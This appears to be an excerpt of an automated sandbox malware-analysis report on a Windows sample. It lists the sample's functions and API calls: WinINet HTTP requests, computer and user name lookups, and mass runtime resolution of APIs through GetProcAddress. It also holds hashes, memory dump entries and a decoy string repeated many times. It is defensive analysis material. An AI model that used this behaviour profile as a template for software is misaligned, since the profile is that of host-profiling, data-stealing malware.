                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C0474F
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C04734
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C045D2
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C04638
                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C046D8
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocateHeapProtectVirtual
                  • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                  • API String ID: 1542196881-2218711628
                  • Opcode ID: 3fad424055591739b944eb445b88f1e5909aece7ad7e7bfaf4d0ad806cb7a9d5
                  • Instruction ID: 4bb59e18992cf063796c4fb23d446b1b53bf2415da6e09845dbf6e8493358560
                  • Opcode Fuzzy Hash: 3fad424055591739b944eb445b88f1e5909aece7ad7e7bfaf4d0ad806cb7a9d5
                  • Instruction Fuzzy Hash: DA41F6707CA6747EC728BBA7B86FEAF77565F46B20F505064F80852682CBB07500A736
                  Function 00C06280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                    • Part of subcall function 00C1A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C1A7E6
                    • Part of subcall function 00C047B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00C04839
                    • Part of subcall function 00C047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00C04849
                    • Part of subcall function 00C1A740: lstrcpy.KERNEL32(00C20E17,00000000), ref: 00C1A788
                  • InternetOpenA.WININET(00C20DFE,00000001,00000000,00000000,00000000), ref: 00C062E1
                  • StrCmpCA.SHLWAPI(?,0179ED68), ref: 00C06303
                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00C06335
                  • HttpOpenRequestA.WININET(00000000,GET,?,0179EC60,00000000,00000000,00400100,00000000), ref: 00C06385
                  • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00C063BF
                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C063D1
                  • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00C063FD
                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00C0646D
                  • InternetCloseHandle.WININET(00000000), ref: 00C064EF
                  • InternetCloseHandle.WININET(00000000), ref: 00C064F9
                  • InternetCloseHandle.WININET(00000000), ref: 00C06503
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                  • String ID: ERROR$ERROR$GET
                  • API String ID: 3749127164-2509457195
                  • Opcode ID: daa4b4714cbcdf0b9d4fe9f740576399e7b0e654783b03742d6c23e4c980c667
                  • Instruction ID: d33f676e175e91c2ac952602473127916085c76cffa16a5fa818840d2b34563b
                  • Opcode Fuzzy Hash: daa4b4714cbcdf0b9d4fe9f740576399e7b0e654783b03742d6c23e4c980c667
                  • Instruction Fuzzy Hash: D7719075A00218AFEB24DFA0DC49BEE7778FB05710F108068F1096B1D0DBB46A89DF91
                  Function 00C178E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1275 c178e0-c17937 GetProcessHeap RtlAllocateHeap GetComputerNameA 1276 c17942-c17945 1275->1276 1277 c17939-c1793e 1275->1277 1278 c17962-c17972 1276->1278 1277->1278
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C17910
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00C17917
                  • GetComputerNameA.KERNEL32(?,00000104), ref: 00C1792F
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateComputerNameProcess
                  • String ID:
                  • API String ID: 1664310425-0
                  • Opcode ID: c466d64f8414c20ffe3df0042cd1f5432b0967aace04ad1f1c3fec0adeda4dda
                  • Instruction ID: d3b8e08852f0edbbffecd0081106c2dadff61c144cdb78addecab7230d0d6ceb
                  • Opcode Fuzzy Hash: c466d64f8414c20ffe3df0042cd1f5432b0967aace04ad1f1c3fec0adeda4dda
                  • Instruction Fuzzy Hash: E501A9B1948204EFC704DF95DD49BAEBBB8F705B21F10426AF545F3780C37459458BA1
                  Function 00C17850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00C011B7), ref: 00C17880
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00C17887
                  • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00C1789F
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateNameProcessUser
                  • String ID:
                  • API String ID: 1296208442-0
                  • Opcode ID: eb036e72d0b8209b893796a1fd902799a597d03a5b0dc017e3ffd4940a120c58
                  • Instruction ID: cba6bc4138df486fb9cefa55838a6e181ad46f132824d0605f7db29f47b64b1a
                  • Opcode Fuzzy Hash: eb036e72d0b8209b893796a1fd902799a597d03a5b0dc017e3ffd4940a120c58
                  • Instruction Fuzzy Hash: 7FF04FB5944208AFC714DF99DD49FAEBBB8EB09721F10026AFA05A2680C77415458BA1
                  Function 00C01160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                  • Associated: 00000000.00000002.1802870844.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000CE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1802914057.0000000000E4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000E5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.0000000000FE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803159062.00000000010FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803437987.00000000010FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1803574256.000000000129A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_c00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExitInfoProcessSystem
                  • String ID:
                  • API String ID: 752954902-0
                  • Opcode ID: 7da37c9c5d355b2b1db1ba4fa35bf792e320e4c743ce4e12fb58a883f5e78bb3
                  • Instruction ID: 0c27100df03e4ffa27c8593ab27de59fcb56f84ef0a9f65b6b833f88735d2864
                  • Opcode Fuzzy Hash: 7da37c9c5d355b2b1db1ba4fa35bf792e320e4c743ce4e12fb58a883f5e78bb3
                  • Instruction Fuzzy Hash: 19D05E7894030CDFCB14DFE1D84D6EDBB78FB09321F040565ED0572340EA306486CAA6
                  Function 00C19C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 633 c19c10-c19c1a 634 c19c20-c1a031 GetProcAddress * 43 633->634 635 c1a036-c1a0ca LoadLibraryA * 8 633->635 634->635 636 c1a146-c1a14d 635->636 637 c1a0cc-c1a141 GetProcAddress * 5 635->637 638 c1a153-c1a211 GetProcAddress * 8 636->638 639 c1a216-c1a21d 636->639 637->636 638->639 640 c1a298-c1a29f 639->640 641 c1a21f-c1a293 GetProcAddress * 5 639->641 642 c1a2a5-c1a332 GetProcAddress * 6 640->642 643 c1a337-c1a33e 640->643 641->640 642->643 644 c1a344-c1a41a GetProcAddress * 9 643->644 645 c1a41f-c1a426 643->645 644->645 646 c1a4a2-c1a4a9 645->646 647 c1a428-c1a49d GetProcAddress * 5 645->647 648 c1a4ab-c1a4d7 GetProcAddress * 2 646->648 649 c1a4dc-c1a4e3 646->649 647->646 648->649 650 c1a515-c1a51c 649->650 651 c1a4e5-c1a510 GetProcAddress * 2 649->651 652 c1a612-c1a619 650->652 653 c1a522-c1a60d GetProcAddress * 10 650->653 651->650 654 c1a61b-c1a678 GetProcAddress * 4 652->654 655 c1a67d-c1a684 652->655 653->652 654->655 656 c1a686-c1a699 GetProcAddress 655->656 657 c1a69e-c1a6a5 655->657 656->657 658 c1a6a7-c1a703 GetProcAddress * 4 657->658 659 c1a708-c1a709 657->659 658->659
                  APIs
                  • GetProcAddress.KERNEL32(74DD0000,01784020), ref: 00C19C2D
                  • GetProcAddress.KERNEL32(74DD0000,01783E00), ref: 00C19C45
                  • GetProcAddress.KERNEL32(74DD0000,01799C88), ref: 00C19C5E
                  • GetProcAddress.KERNEL32(74DD0000,01799CA0), ref: 00C19C76
                  • GetProcAddress.KERNEL32(74DD0000,01799CB8), ref: 00C19C8E
                  • GetProcAddress.KERNEL32(74DD0000,01799CD0), ref: 00C19CA7
                  • GetProcAddress.KERNEL32(74DD0000,0178B8E8), ref: 00C19CBF
                  • GetProcAddress.KERNEL32(74DD0000,01799BF8), ref: 00C19CD7
                  • GetProcAddress.KERNEL32(74DD0000,01799DA8), ref: 00C19CF0
                  • GetProcAddress.KERNEL32(74DD0000,01799B38), ref: 00C19D08
                  • GetProcAddress.KERNEL32(74DD0000,01799D00), ref: 00C19D20
                  • GetProcAddress.KERNEL32(74DD0000,01783F80), ref: 00C19D39
                  • GetProcAddress.KERNEL32(74DD0000,01783F40), ref: 00C19D51
                  • GetProcAddress.KERNEL32(74DD0000,01783F60), ref: 00C19D69
                  • GetProcAddress.KERNEL32(74DD0000,01783EC0), ref: 00C19D82
                  • GetProcAddress.KERNEL32(74DD0000,01799D18), ref: 00C19D9A
                  • GetProcAddress.KERNEL32(74DD0000,01799D30), ref: 00C19DB2
                  • GetProcAddress.KERNEL32(74DD0000,0178B910), ref: 00C19DCB
                  • GetProcAddress.KERNEL32(74DD0000,01784000), ref: 00C19DE3
                  • GetProcAddress.KERNEL32(74DD0000,01799DC0), ref: 00C19DFB
                  • GetProcAddress.KERNEL32(74DD0000,01799AD8), ref: 00C19E14
                  • GetProcAddress.KERNEL32(74DD0000,01799B50), ref: 00C19E2C
                  • GetProcAddress.KERNEL32(74DD0000,01799E98), ref: 00C19E44
                  • GetProcAddress.KERNEL32(74DD0000,01783D40), ref: 00C19E5D
                  • GetProcAddress.KERNEL32(74DD0000,01799E20), ref: 00C19E75
                  • GetProcAddress.KERNEL32(74DD0000,01799E08), ref: 00C19E8D
                  • GetProcAddress.KERNEL32(74DD0000,01799E38), ref: 00C19EA6
                  • GetProcAddress.KERNEL32(74DD0000,01799E50), ref: 00C19EBE
                  • GetProcAddress.KERNEL32(74DD0000,01799E68), ref: 00C19ED6
                  • GetProcAddress.KERNEL32(74DD0000,01799E80), ref: 00C19EEF
                  • GetProcAddress.KERNEL32(74DD0000,01799DD8), ref: 00C19F07
                  • GetProcAddress.KERNEL32(74DD0000,01799DF0), ref: 00C19F1F
                  • GetProcAddress.KERNEL32(74DD0000,0179D500), ref: 00C19F38
                  • GetProcAddress.KERNEL32(74DD0000,0179A880), ref: 00C19F50
                  • GetProcAddress.KERNEL32(74DD0000,0179D530), ref: 00C19F68
                  • GetProcAddress.KERNEL32(74DD0000,0179D4D0), ref: 00C19F81
                  • GetProcAddress.KERNEL32(74DD0000,01784060), ref: 00C19F99
                  • GetProcAddress.KERNEL32(74DD0000,0179D5A8), ref: 00C19FB1
                  • GetProcAddress.KERNEL32(74DD0000,01783D80), ref: 00C19FCA
                  • GetProcAddress.KERNEL32(74DD0000,0179D458), ref: 00C19FE2
                  • GetProcAddress.KERNEL32(74DD0000,0179D578), ref: 00C19FFA
                  • GetProcAddress.KERNEL32(74DD0000,0177AD00), ref: 00C1A013
                  • GetProcAddress.KERNEL32(74DD0000,0179DE60), ref: 00C1A02B
                  • LoadLibraryA.KERNEL32(0179D470,?,00C15CA3,00C20AEB,?,?,?,?,?,?,?,?,?,?,00C20AEA,00C20AE3), ref: 00C1A03D
                  • LoadLibraryA.KERNEL32(0179D410,?,00C15CA3,00C20AEB,?,?,?,?,?,?,?,?,?,?,00C20AEA,00C20AE3), ref: 00C1A04E
                  • LoadLibraryA.KERNEL32(0179D698,?,00C15CA3,00C20AEB,?,?,?,?,?,?,?,?,?,?,00C20AEA,00C20AE3), ref: 00C1A060
                  • LoadLibraryA.KERNEL32(0179D488,?,00C15CA3,00C20AEB,?,?,?,?,?,?,?,?,?,?,00C20AEA,00C20AE3), ref: 00C1A072
                  • LoadLibraryA.KERNEL32(0179D428,?,00C15CA3,00C20AEB,?,?,?,?,?,?,?,?,?,?,00C20AEA,00C20AE3), ref: 00C1A083
                  • LoadLibraryA.KERNEL32(0179D668,?,00C15CA3,00C20AEB,?,?,?,?,?,?,?,?,?,?,00C20AEA,00C20AE3), ref: 00C1A095
                  • LoadLibraryA.KERNEL32(0179D518,?,00C15CA3,00C20AEB,?,?,?,?,?,?,?,?,?,?,00C20AEA,00C20AE3), ref: 00C1A0A7
                  • LoadLibraryA.KERNEL32(0179D3F8,?,00C15CA3,00C20AEB,?,?,?,?,?,?,?,?,?,?,00C20AEA,00C20AE3), ref: 00C1A0B8
                  • GetProcAddress.KERNEL32(75290000,0179DFC0), ref: 00C1A0DA
                  • GetProcAddress.KERNEL32(75290000,0179D5C0), ref: 00C1A0F2
                  • GetProcAddress.KERNEL32(75290000,01799400), ref: 00C1A10A
                  • GetProcAddress.KERNEL32(75290000,0179D5D8), ref: 00C1A123
                  • GetProcAddress.KERNEL32(75290000,0179DF60), ref: 00C1A13B
                  • GetProcAddress.KERNEL32(73560000,0178B7A8), ref: 00C1A160
                  • GetProcAddress.KERNEL32(73560000,0179DE40), ref: 00C1A179
                  • GetProcAddress.KERNEL32(73560000,0178B7D0), ref: 00C1A191
                  • GetProcAddress.KERNEL32(73560000,0178D688), ref: 00C1A1A9
                  • GetProcAddress.KERNEL32(73560000,0178D6B8), ref: 00C1A1C2
                  • GetProcAddress.KERNEL32(73560000,0179DE00), ref: 00C1A1DA
                  • GetProcAddress.KERNEL32(73560000,0179DDE0), ref: 00C1A1F2
                  • GetProcAddress.KERNEL32(73560000,0178D6D0), ref: 00C1A20B
                  • GetProcAddress.KERNEL32(752C0000,0179E060), ref: 00C1A22C
                  • GetProcAddress.KERNEL32(752C0000,0179DFE0), ref: 00C1A244
                  • GetProcAddress.KERNEL32(752C0000,0178D5B0), ref: 00C1A25D
                  • GetProcAddress.KERNEL32(752C0000,0178D5E0), ref: 00C1A275
                  • GetProcAddress.KERNEL32(752C0000,0179DFA0), ref: 00C1A28D
                  • GetProcAddress.KERNEL32(74EC0000,0178B938), ref: 00C1A2B3
                  • GetProcAddress.KERNEL32(74EC0000,0178BA00), ref: 00C1A2CB
                  • GetProcAddress.KERNEL32(74EC0000,0178D538), ref: 00C1A2E3
                  • GetProcAddress.KERNEL32(74EC0000,0179DE20), ref: 00C1A2FC
                  • GetProcAddress.KERNEL32(74EC0000,0179DEE0), ref: 00C1A314
                  • GetProcAddress.KERNEL32(74EC0000,0178BA28), ref: 00C1A32C
                  • GetProcAddress.KERNEL32(75BD0000,0178D568), ref: 00C1A352
                  • GetProcAddress.KERNEL32(75BD0000,0179E000), ref: 00C1A36A
                  • GetProcAddress.KERNEL32(75BD0000,01799450), ref: 00C1A382
                  • GetProcAddress.KERNEL32(75BD0000,0178D580), ref: 00C1A39B
                  • GetProcAddress.KERNEL32(75BD0000,0178D5C8), ref: 00C1A3B3
                  • GetProcAddress.KERNEL32(75BD0000,0179E020), ref: 00C1A3CB
                  • GetProcAddress.KERNEL32(75BD0000,0179DF80), ref: 00C1A3E4
                  • GetProcAddress.KERNEL32(75BD0000,0178D598), ref: 00C1A3FC
                  • GetProcAddress.KERNEL32(75BD0000,0178D5F8), ref: 00C1A414
                  • GetProcAddress.KERNEL32(75A70000,0179DF00), ref: 00C1A436
                  • GetProcAddress.KERNEL32(75A70000,0179E1F0), ref: 00C1A44E
                  • GetProcAddress.KERNEL32(75A70000,0179E190), ref: 00C1A466
                  • GetProcAddress.KERNEL32(75A70000,0179E268), ref: 00C1A47F
                  • GetProcAddress.KERNEL32(75A70000,0179E130), ref: 00C1A497
                  • GetProcAddress.KERNEL32(75450000,0179DF20), ref: 00C1A4B8
                  • GetProcAddress.KERNEL32(75450000,0179DD20), ref: 00C1A4D1
                  • GetProcAddress.KERNEL32(75DA0000,0179DD00), ref: 00C1A4F2
                  • GetProcAddress.KERNEL32(75DA0000,0179E1C0), ref: 00C1A50A
                  • GetProcAddress.KERNEL32(6F070000,0179E080), ref: 00C1A530
                  • GetProcAddress.KERNEL32(6F070000,0179DD80), ref: 00C1A548
                  • GetProcAddress.KERNEL32(6F070000,0179DF40), ref: 00C1A560
                  • GetProcAddress.KERNEL32(6F070000,0179E280), ref: 00C1A579
                  • GetProcAddress.KERNEL32(6F070000,0179E040), ref: 00C1A591
                  • GetProcAddress.KERNEL32(6F070000,0179E0A0), ref: 00C1A5A9
                  • GetProcAddress.KERNEL32(6F070000,0179DD40), ref: 00C1A5C2
                  • GetProcAddress.KERNEL32(6F070000,0179DE80), ref: 00C1A5DA
                  • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 00C1A5F1
                  • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 00C1A607
                  • GetProcAddress.KERNEL32(75AF0000,0179E208), ref: 00C1A629
                  • GetProcAddress.KERNEL32(75AF0000,01799500), ref: 00C1A641
                  • GetProcAddress.KERNEL32(75AF0000,0179E298), ref: 00C1A659
                  • GetProcAddress.KERNEL32(75AF0000,0179E2B0), ref: 00C1A672
                  • GetProcAddress.KERNEL32(75D90000,0179DDA0), ref: 00C1A693
                  • GetProcAddress.KERNEL32(6FAB0000,0179E2C8), ref: 00C1A6B4
                  • GetProcAddress.KERNEL32(6FAB0000,0179DDC0), ref: 00C1A6CD
                  • GetProcAddress.KERNEL32(6FAB0000,0179E100), ref: 00C1A6E5
                  • GetProcAddress.KERNEL32(6FAB0000,0179E220), ref: 00C1A6FD
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1802914057.0000000000C01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
